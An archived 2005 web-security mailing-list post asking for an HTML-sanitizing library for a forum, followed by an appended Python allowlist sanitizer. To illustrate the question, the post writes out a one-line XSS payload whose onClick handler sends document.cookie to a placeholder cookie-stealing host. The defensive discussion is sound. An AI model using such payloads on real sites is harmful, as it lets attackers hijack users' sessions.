[WEB SECURITY] magic_quotes

Pablo Fernández newsclient at teamq.info
Fri Jun 24 10:28:34 EDT 2005


Hi people

Do you happen to know of any library like the PHP Filter one but that is
able to strip *certain* HTML entities, i.e., I have a forum, people can
post using a WYSIWYG, so I want to allow stuff like <b> <i> <u> but I
really don't want to allow <iframe> <script>.

It just popped into my head: how do stable boards handle stuff like
onClick=""? I mean, do they manage <a href="#"
onClick="self.location.href='http://cookiestealer.dude/?'+document.cookie;"> and what about <a href="javascript:....">???

OK, if you are aware of something like this, please drop me a line.

Thanks!

Best regards,
Pablo

-------------- next part --------------
An embedded message was scrubbed...
From: Dave King <davefd at davewking.com>
Subject: Re: [WEB SECURITY] magic_quotes
Date: Tue, 21 Jun 2005 16:27:49 -0600
Size: 4817
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20050624/371fc3d6/attachment.mht>
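
An allowlist filter of the kind asked about above, as an added example that is not part of the original message or of any library it mentions: it keeps <b>, <i>, <u> and <a href>, drops every other tag and attribute (so onClick never survives), discards <script> and <iframe> together with their content, and rejects href values whose scheme is not allowlisted. It is written with Python's standard html.parser for illustration; the names ForumSanitizer, sanitize and safe_url and the scheme list are assumptions.

```python
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "a"}           # formatting the forum permits
ALLOWED_ATTRS = {"a": {"href"}}                # every other attribute, on* included, is dropped
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed policy for link targets
DROP_WITH_CONTENT = {"script", "iframe", "style"}

def safe_url(value):
    """Accept relative URLs and absolute URLs whose scheme is allowlisted."""
    cleaned = re.sub(r"[\x00-\x20]+", "", value)   # browsers ignore tabs/newlines here
    head = re.split(r"[/?#]", cleaned, maxsplit=1)[0]
    return ":" not in head or head.split(":", 1)[0].lower() in ALLOWED_SCHEMES

class ForumSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities decoded before checks
        self.out, self.open_tags, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1                         # discard element and its body
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = "".join(
                f' {name}="{html.escape(value, quote=True)}"'
                for name, value in attrs
                if name in ALLOWED_ATTRS.get(tag, ()) and value and safe_url(value))
            self.out.append(f"<{tag}{kept}>")
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.open_tags:
            while self.open_tags:                  # close inner tags first
                closing = self.open_tags.pop()
                self.out.append(f"</{closing}>")
                if closing == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))  # text is re-escaped

def sanitize(markup):
    parser = ForumSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out) + "".join(f"</{t}>" for t in reversed(parser.open_tags))
```

Because the output is rebuilt from parsed tokens rather than edited in place, anything the allowlist does not name is absent from the result instead of being pattern-matched out of it.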